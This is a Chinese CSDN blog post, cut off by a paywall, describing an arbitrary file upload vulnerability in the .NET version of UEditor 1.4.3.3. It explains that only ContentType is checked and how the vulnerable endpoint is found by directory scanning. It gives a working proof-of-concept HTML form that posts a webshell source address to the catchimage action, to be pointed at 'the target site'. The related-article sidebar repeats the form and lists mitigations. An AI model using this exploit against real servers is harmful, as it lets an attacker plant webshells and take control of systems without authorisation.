实战 UEditor 任意文件上传漏洞

最新推荐文章于 2024-09-16 07:17:23 发布
最新推荐文章于 2024-09-16 07:17:23 发布
阅读量1.7k 收藏
点赞数
分类专栏: 各种渗透 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_sweelg/article/details/126764361
版权
本文详细介绍了UEditor .NET版本的一个安全漏洞,该漏洞允许任意文件上传。漏洞利用主要由于只检查了ContentType,攻击者可以通过特定方式上传图片马,然后通过web服务下载。测试表明,只有png类型的图片马能够成功上传,而jpg则无法上传。利用此漏洞,攻击者可以进一步控制服务器。
摘要由CSDN通过智能技术生成

漏洞介绍

该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET

漏洞原理

获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传

漏洞实战

通过目录扫描到站点下存在ueditor编辑器

通过访问指定路径的返回判断存在漏洞

http://xxx/ueditor/net/controller.ashx?action=catchimage

 poc为如下 把xxx更换为目标站点即可

<form action="http://xxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr: <input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
最低0.47元/天 解锁文章
Sweelg
关注
专栏目录
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
UEditor 任意文件上传漏洞
热门推荐
qq_50854662的博客
10-27 2万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文......
实战纪实 | 编辑器漏洞Ueditor-任意文件上传漏洞 (老洞新谈)
zkaqlaoniao的博客
04-12 1万+
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueGetshell.py:UEditor .NET GetShell漏洞检测利器
最新发布
gitblog_00734的博客
09-16 556
ueGetshell.py:UEditor .NET GetShell漏洞检测利器 ueditor-getshell ueditor .net getshell 项目地址: https://gitcode.com/gh_mirro...
UEditor编辑器任意文件上传漏洞分析
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
12-03 1912
ue下载地址http://http://ueditor.baidu.com/website/download.html exp <form action="http://192.168.1.103/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="sour
Ueditor编辑器任意文件上传漏洞
m0_51468027的博客
07-30 1万+
一文学习Ueditor编辑器任意文件上传漏洞(部署环境到漏洞复现)
ueditor任意文件上传漏洞与解决方案
菜鸟成长史
08-02 1677
是一款颇为老旧的富文本编辑器,曾经普遍流行过所以在一些老的项目里面,还会存在。但是该项目到目前为止已经永久停止更新,所以当发现漏洞时,只能自己维护。最好停止使用并更换富文本编辑器组件。
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
Boom!脑洞大爆炸的博客
07-07 7349
UEditor v1.4.3.3 .net版本任意文件上传 漏洞复现
【合天网安】FCKeditor 2.4.3文件上传漏洞
hehigoxqc606的博客
09-01 1020
【合天网安实验室】FCKeditor 2.4.3文件上传漏洞 编辑器漏洞 常见的文本编辑器有FCKeditor、Ewebeditor、UEditor、KindEditor、XHeditor等,它们包含的功能类似,如图片上传、视频上传、远程下载等。使用这类编辑器减少了程序开发的时间,但也存在通用性漏洞带来的危害。 漏洞介绍 FCKeditor/fckeditor/editor/filemanager/upload/php/upload.php文件上传漏洞漏洞修复:...
网站漏洞挖掘思路
bluemoon_0的博客
03-13 528
网站漏洞挖掘思路
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 2112
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
ueditor 文件上传漏洞_ueditor编辑器上传漏洞
weixin_29476767的博客
02-22 761
摘要:  UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。开源基于BSD协议,所有源代码在协议允许范围...UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。开源基于BSD协议,所有源代码在协议允许范围内可自由修改和使用。百度UEditor的推出,可以帮助不少网站开发者在开...
技术分享|ueditor漏洞利用&源码分析超详细分析
baidu_38876334的博客
04-02 5200
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
UEditor编辑器两个版本任意文件上传漏洞分析
weixin_34009794的博客
12-30 1069
0x01 前言 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点 ,被广大WEB应用程序所使用;本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。 ...
ueditor 文件上传漏洞_UEditor .Net版本任意文件上传漏洞
weixin_30095343的博客
02-22 594
报告编号: B6-2018-082202报告来源: 360CERT报告作者: 360CERT更新日期: 2018-08-220x00 漏洞背景UEditor 是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。0x01 漏洞影响该漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响。0x02 ...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1475
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
ueditor php文件上传漏洞
06-06
UEditor的PHP版本的文件上传漏洞主要是由于后台没有进行严格的文件类型、大小和内容的检测,攻击者可以通过修改上传文件的文件名和后缀来绕过检测,上传恶意文件,从而在服务器上执行任意代码。 攻击者可以通过以下方式来利用文件上传漏洞: 1. 修改文件名和后缀:攻击者可以将恶意文件的文件名和后缀修改为常见的图片、文档或者压缩文件的后缀名,来绕过后台的文件类型检测。比如将恶意文件的文件名修改为“test.jpg”,就可以上传一个恶意的PHP文件,并且绕过后台的检测。 2. 绕过文件大小限制:攻击者可以通过改变文件上传请求中的Content-Length值,来绕过后台的文件大小限制。比如,攻击者可以使用Burp Suite等工具,修改Content-Length值,将一个超过限制大小的文件上传到服务器。 为了防止文件上传漏洞的利用,应该对上传的文件进行严格的文件类型、大小和内容的检测。具体措施可以包括: 1. 对上传文件的后缀名进行白名单过滤,只允许上传指定的文件类型。 2. 对上传文件的大小进行限制,限制上传文件的大小不能超过最大限制值。 3. 对上传文件的内容进行检测,防止上传恶意文件。 4. 对上传目录进行安全设置,禁止直接访问上传目录下的文件。 5. 定期清理上传目录,删除不必要的文件。 总之,为了保障网站的安全性,必须加强文件上传安全控制,防止恶意文件的上传和执行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值